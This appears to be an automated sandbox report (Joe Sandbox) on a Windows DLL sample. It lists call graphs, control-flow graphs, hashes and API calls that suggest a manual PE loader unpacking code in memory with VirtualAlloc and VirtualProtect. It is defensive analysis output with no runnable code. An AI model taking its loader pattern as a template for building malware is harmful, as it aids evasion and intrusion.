1002e577 __output_l 67 API calls 21631->21632 21632->21623 21634->21630 21686 10032cb9 10 API calls 3 library calls 21634->21686 21637 10030759 __IsNonwritableInCurrentImage 21636->21637 21687 1003817c 21637->21687 21639 10030777 __initterm_e 21641 10030796 __IsNonwritableInCurrentImage __initterm 21639->21641 21691 1002e391 21639->21691 21641->21520 21735 100307d0 21642->21735 21644 1003091d 21644->21488 21645->21493 21646->21498 21647->21513 21648->21499 21649->21503 21650->21493 21651->21518 21652->21493 21653->21540 21654->21546 21656 100344e2 GetModuleHandleW 21655->21656 21657 100344c1 21655->21657 21658 100344f2 21656->21658 21659 100344fd GetProcAddress 21656->21659 21657->21656 21660 100344cb TlsGetValue 21657->21660 21668 1003065c Sleep GetModuleHandleW 21658->21668 21664 100344da 21659->21664 21663 100344d6 21660->21663 21662 100344f8 21662->21659 21662->21664 21663->21656 21663->21664 21664->21549 21665->21556 21666->21565 21667->21542 21668->21662 21669->21584 21670->21583 21671->21591 21672->21595 21673->21605 21674->21602 21677 10036df5 21675->21677 21679 10036e62 21677->21679 21683 10031907 77 API calls x_ismbbtype_l 21677->21683 21678 10036f60 21678->21615 21678->21616 21679->21678 21680 10031907 77 API calls _parse_cmdline 21679->21680 21680->21679 21681->21610 21682->21618 21683->21677 21684->21625 21685->21630 21686->21634 21688 10038182 21687->21688 21689 100344a9 __encode_pointer 6 API calls 21688->21689 21690 1003819a 21688->21690 21689->21688 21690->21639 21694 1002e355 21691->21694 21693 1002e39e 21693->21641 21695 1002e361 _fputc 21694->21695 21702 100306f8 21695->21702 21701 1002e382 _fputc 21701->21693 21703 10035865 __lock 67 API calls 21702->21703 21704 1002e366 21703->21704 21705 1002e26a 21704->21705 21706 10034524 __decode_pointer 7 API calls 21705->21706 21707 1002e27e 21706->21707 21708 10034524 __decode_pointer 7 API calls 21707->21708 21709 1002e28e 21708->21709 21720 1002e311 21709->21720 21728 100317be 68 API calls 5 library calls 21709->21728 21711 1002e2ac 21714 1002e2d6 21711->21714 21715 1002e2c7 21711->21715 21724 1002e2f8 21711->21724 21712 100344a9 __encode_pointer 6 API calls 21713 1002e306 21712->21713 21716 100344a9 __encode_pointer 6 API calls 21713->21716 21718 1002e2d0 21714->21718 21714->21720 21729 1003523f 74 API calls _realloc 21715->21729 21716->21720 21718->21714 21722 1002e2ec 21718->21722 21730 1003523f 74 API calls _realloc 21718->21730 21725 1002e38b 21720->21725 21721 1002e2e6 21721->21720 21721->21722 21723 100344a9 __encode_pointer 6 API calls 21722->21723 21723->21724 21724->21712 21731 10030701 21725->21731 21728->21711 21729->21718 21730->21721 21734 1003578b LeaveCriticalSection 21731->21734 21733 1002e390 21733->21701 21734->21733 21736 100307dc _fputc 21735->21736 21737 10035865 __lock 67 API calls 21736->21737 21738 100307e3 21737->21738 21739 1003089c __initterm 21738->21739 21741 10034524 __decode_pointer 7 API calls 21738->21741 21754 100308e7 LeaveCriticalSection _doexit 21739->21754 21743 1003081a 21741->21743 21742 100308c8 21744 100308f6 _fputc 21742->21744 21745 100308ce 21742->21745 21743->21739 21747 10034524 __decode_pointer 7 API calls 21743->21747 21744->21644 21755 1003578b LeaveCriticalSection 21745->21755 21751 1003082f 21747->21751 21748 100308db 21756 100306e0 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 21748->21756 21751->21739 21752 1003451b 6 API calls __is_LFH_enabled 21751->21752 21753 10034524 7 API calls __decode_pointer 21751->21753 21752->21751 21753->21751 21754->21742 21755->21748 21758 1001ffdf _strlen 21757->21758 21772 1001f0b0 21758->21772 21760 10020056 ___DllMainCRTStartup 21763 10020305 21760->21763 21781 10001920 69 API calls 4 library calls 21760->21781 21762 10020326 21777 1001f970 21762->21777 21763->21762 21782 1001f830 69 API calls ___DllMainCRTStartup 21763->21782 21767 10008000 21768 1002e654 _malloc 67 API calls 21767->21768 21769 10008010 21768->21769 21770 1000801c 21769->21770 21771 1002e577 __output_l 67 API calls 21769->21771 21771->21770 21783 1001f910 21772->21783 21775 1001f148 21775->21760 21778 1001f995 21777->21778 21779 1000809c 21777->21779 21789 10044028 LeaveCriticalSection int 21778->21789 21779->21767 21781->21763 21782->21762 21784 1001f93d 21783->21784 21785 1001f0ed 21783->21785 21788 1004401f EnterCriticalSection std::_Lockit::_Lockit 21784->21788 21785->21775 21787 1001ea80 69 API calls std::ios_base::_Init 21785->21787 21787->21775 21788->21785 21789->21779

                                                                                                          Executed Functions

                                                                                                          Function 10002D40, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7 10002d40-10002d67 call 100024a0 10 10002d70-10002d81 7->10 11 10002d69-10002d6b 7->11 13 10002d83-10002d90 SetLastError 10->13 14 10002d95-10002db0 call 100024a0 10->14 12 1000315a-1000315d 11->12 13->12 17 10002db2-10002db4 14->17 18 10002db9-10002dce 14->18 17->12 19 10002dd0-10002ddd SetLastError 18->19 20 10002de2-10002def 18->20 19->12 21 10002df1-10002dfe SetLastError 20->21 22 10002e03-10002e0c 20->22 21->12 23 10002e20-10002e41 22->23 24 10002e0e-10002e1b SetLastError 22->24 25 10002e55-10002e5f 23->25 24->12 26 10002e61-10002e68 25->26 27 10002e97-10002ed2 GetNativeSystemInfo 25->27 30 10002e78-10002e84 26->30 31 10002e6a-10002e76 26->31 28 10002ed4-10002ee1 SetLastError 27->28 29 10002ee6-10002f05 VirtualAlloc 27->29 28->12 33 10002f32-10002f4a GetProcessHeap HeapAlloc 29->33 34 10002f07-10002f21 VirtualAlloc 29->34 32 10002e87-10002e8d 30->32 31->32 35 10002e95 32->35 36 10002e8f-10002e92 32->36 38 10002f6c-10002fd0 call 100024a0 33->38 39 10002f4c-10002f67 VirtualFree SetLastError 33->39 34->33 37 10002f23-10002f2d SetLastError 34->37 35->25 36->35 37->12 43 10002fd2 38->43 44 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 38->44 39->12 45 1000314c-10003158 call 10003310 43->45 52 10003043 44->52 53 1000304d-1000305e 44->53 45->12 52->45 54 10003060-10003076 call 100029c0 53->54 55 10003078-1000307b 53->55 57 10003082-10003090 call 10002ab0 54->57 55->57 61 10003092 57->61 62 1000309c-100030a3 call 100027c0 57->62 61->45 64 100030a8-100030aa 62->64 65 100030b6-100030c4 call 10002940 64->65 66 100030ac 64->66 69 100030c6 65->69 70 100030cd-100030d6 65->70 66->45 69->45 71 100030d8-100030df 70->71 72 1000313d-10003140 70->72 73 100030e1-1000310d 71->73 74 1000312a-10003138 71->74 75 10003147-1000314a 72->75 78 1000311e-10003128 73->78 79 1000310f-1000311a SetLastError 73->79 76 1000313b 74->76 75->12 75->45 76->75 78->76 79->45
                                                                                                          APIs
                                                                                                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                                                                                                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE1E
                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE53
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE5A
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE6F
                                                                                                          • _memset.LIBCMT ref: 1002AE89
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 496899490-0
                                                                                                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                                                                                                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __lock.LIBCMT ref: 1002E595
                                                                                                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                                                                                                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                                                                                                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                                                                                                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714421763-0
                                                                                                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                                                                                                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 100036a0-100036bb call 1002e654 133 100036c0-100036e5 131->133 135 10003896-100038b1 133->135 136 100036eb-10003891 133->136 138 100038b7-10004a34 135->138 139 10004a39-10004a3d 135->139
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 100036BB
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 501242067-2694261586
                                                                                                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                                                                                                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 140 10003440-1000344d 141 10003454-10003462 140->141 142 1000344f call 100033f0 140->142 144 10003464-10003466 141->144 145 1000346b-10003486 141->145 142->141 146 10003699-1000369c 144->146 147 10003495-100034a2 145->147 148 10003488-10003493 145->148 149 100034b1-100034b7 call 1002e654 147->149 150 100034a4-100034af 147->150 148->147 152 100034bc-100034c6 149->152 150->149 153 100034c8-100034ca 152->153 154 100034cf-100034d6 152->154 153->146 155 100034dd-100034e3 154->155 156 10003696 155->156 157 100034e9-100034f5 155->157 156->146 158 100034f7-10003509 157->158 159 1000350b-10003527 157->159 160 1000352a-1000353c 158->160 159->160 161 10003552-1000356d 160->161 162 1000353e-10003550 160->162 163 10003570-10003582 161->163 162->163 164 10003584-10003596 163->164 165 10003598-100035b4 163->165 166 100035b7-100035c9 164->166 165->166 167 100035cb-100035dd 166->167 168 100035df-100035fb 166->168 169 100035fe-10003628 167->169 168->169 170 10003647-1000364f 169->170 171 1000362a-10003644 169->171 172 10003651-1000366b 170->172 173 1000366e-10003676 170->173 171->170 172->173 174 10003691 173->174 175 10003678-1000368e 173->175 174->155 175->174
                                                                                                          APIs
                                                                                                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                                                                                                          • _malloc.LIBCMT ref: 100034B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 1579825452-2694261586
                                                                                                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                                                                                                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 176 10002690-100026a0 177 100026a2-100026a7 176->177 178 100026ac-100026b8 176->178 179 100027ac-100027af 177->179 180 10002714-10002776 178->180 181 100026ba-100026c5 178->181 184 10002784-100027a1 VirtualProtect 180->184 185 10002778-10002781 180->185 182 100026c7-100026ce 181->182 183 1000270a-1000270f 181->183 186 100026d0-100026de 182->186 187 100026f2-10002704 VirtualFree 182->187 183->179 188 100027a3-100027a5 184->188 189 100027a7 184->189 185->184 186->187 190 100026e0-100026f0 186->190 187->183 188->179 189->179 190->183 190->187
                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 191 100024d0-100024fe 192 10002512-1000251e 191->192 193 10002524-1000252b 192->193 194 10002616 192->194 195 10002593-100025ae call 100024a0 193->195 196 1000252d-1000253a 193->196 197 1000261b-1000261e 194->197 206 100025b0-100025b2 195->206 207 100025b4-100025d9 VirtualAlloc 195->207 198 1000253c-1000255e VirtualAlloc 196->198 199 1000258e 196->199 201 10002560-10002562 198->201 202 10002567-1000258b call 100022d0 198->202 199->192 201->197 202->199 206->197 209 100025db-100025dd 207->209 210 100025df-1000260e call 10002320 207->210 209->197 210->194
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                                                                                                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1104862767-0
                                                                                                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                                                                                                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 246 1001fb60-1001fba1 call 100236ce 248 1001fba3-1001fbaa 246->248 249 1001fbb1-1001fbb7 248->249 250 1001fbac call 1001fb50 248->250 252 1001fbc1-1001fbc4 249->252 253 1001fbb9-1001fbbf 249->253 250->249 254 1001fbc7-1001fc07 call 1002e804 252->254 253->254 257 1001fc09-1001fc19 254->257 258 1001fc1e-1001fc2c 254->258 257->258
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
